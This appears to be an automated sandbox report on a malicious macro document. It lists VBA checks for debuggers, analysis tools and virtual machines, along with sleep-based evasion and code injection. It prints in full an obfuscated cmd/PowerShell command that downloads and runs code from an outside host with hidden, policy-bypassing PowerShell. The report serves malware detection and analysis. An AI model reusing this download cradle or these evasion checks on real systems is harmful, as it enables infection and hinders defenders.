Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","olly")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","fiddler")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","swingbox")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vboxtray")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vboxtray")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","secunia")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","hijack")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vbox")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vmware")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vxstream")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","autoit")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vmtools")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","tcpview")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","process explorer")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","hacker")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","malzilla")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","procexp")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","wireshark")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","hxd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","powershell_ise")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","ida")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","olly")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","fiddler")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","swingbox")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vboxtray")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vboxtray")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","secunia")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","hijack")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vbox")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vmware")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vxstream")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","autoit")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vmtools")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","tcpview")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","process explorer")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","hacker")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","malzilla")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","procexp")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","wireshark")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","hxd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","powershell_ise")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","ida")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","olly")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","fiddler")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","swingbox")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vboxtray")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vboxtray")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","secunia")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","hijack")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vbox")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vmware")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vxstream")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","autoit")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vmtools")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","tcpview")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","process explorer")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","hacker")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","malzilla")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","procexp")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","wireshark")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","hxd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","powershell_ise")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","ida")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","olly")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","fiddler")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","swingbox")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vboxtray")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vboxtray")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","secunia")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","hijack")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vbox")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmware")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vxstream")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","autoit")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmtools")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","tcpview")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","process explorer")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","hacker")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","malzilla")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","procexp")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","wireshark")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","hxd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","powershell_ise")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","ida")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","olly")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","fiddler")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","swingbox")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vboxtray")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vboxtray")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","secunia")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","hijack")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vbox")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmware")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vxstream")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","autoit")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmtools")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","tcpview")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","process explorer")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","hacker")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","malzilla")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","procexp")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","wireshark")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","hxd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","powershell_ise")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","ida")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","olly")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","fiddler")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","swingbox")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vboxtray")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vboxtray")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","secunia")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","hijack")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vbox")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vmware")Name: KYEPC270
Evasive VBA macro found (queries processes via WMI)Show sources
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API ExecQuery("SELECT NamE FROM WIn32_PRoCEsS")Name: KYEPC270
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 1056Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3519Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2122Jump to behavior
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\splwow64.exe TID: 1736Thread sleep count: 1056 > 30Jump to behavior
Source: C:\Windows\splwow64.exe TID: 1736Thread sleep time: -126720000s >= -30000sJump to behavior
Source: C:\Windows\splwow64.exe TID: 1736Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3048Thread sleep count: 3519 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3048Thread sleep count: 2122 > 30Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\splwow64.exeLast function: Thread delayed
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: splwow64.exe, 00000002.00000002.2362858959.051B0000.00000002.sdmp, powershell.exe, 0000000C.00000002.2383480413.08B80000.00000002.sdmpBinary or memory string: A virtual machine could not be started because Hyper-V is not installed.
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\mshta.exeSystem information queried: KernelDebuggerInformationJump to behavior
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Early bird code injection technique detectedShow sources
Source: C:\Windows\System32\cmd.exeProcess created / APC Queued / Resumed: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\WiNDOws\sYsTEM32\Cmd.eXE /c %gNpq%Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' ECHO inVOKe-ExPRessiON (get-ItEM eNV:AYw).valUe 'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen -Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50Jump to behavior
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: splwow64.exe, 00000002.00000002.2362762517.03D70000.00000002.sdmp, mshta.exe, 00000007.00000002.2367284180.03B60000.00000002.sdmp, conhost.exe, 00000009.00000002.2372673866.03F90000.00000002.sdmp, powershell.exe, 0000000C.00000002.2377845234.04160000.00000002.sdmpBinary or memory string: Progman
Source: splwow64.exe, 00000002.00000002.2362762517.03D70000.00000002.sdmp, mshta.exe, 00000007.00000002.2367284180.03B60000.00000002.sdmp, conhost.exe, 00000009.00000002.2372673866.03F90000.00000002.sdmp, powershell.exe, 0000000C.00000002.2377845234.04160000.00000002.sdmpBinary or memory string: Program Manager
Source: splwow64.exe, 00000002.00000002.2362762517.03D70000.00000002.sdmp, mshta.exe, 00000007.00000002.2367284180.03B60000.00000002.sdmp, conhost.exe, 00000009.00000002.2372673866.03F90000.00000002.sdmp, powershell.exe, 0000000C.00000002.2377845234.04160000.00000002.sdmpBinary or memory string: Shell_TrayWnd
Source: splwow64.exe, 00000002.00000002.2362762517.03D70000.00000002.sdmp, mshta.exe, 00000007.00000002.2367284180.03B60000.00000002.sdmp, conhost.exe, 00000009.00000002.2372673866.03F90000.00000002.sdmp, powershell.exe, 0000000C.00000002.2377845234.04160000.00000002.sdmpBinary or memory string: SGProgman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
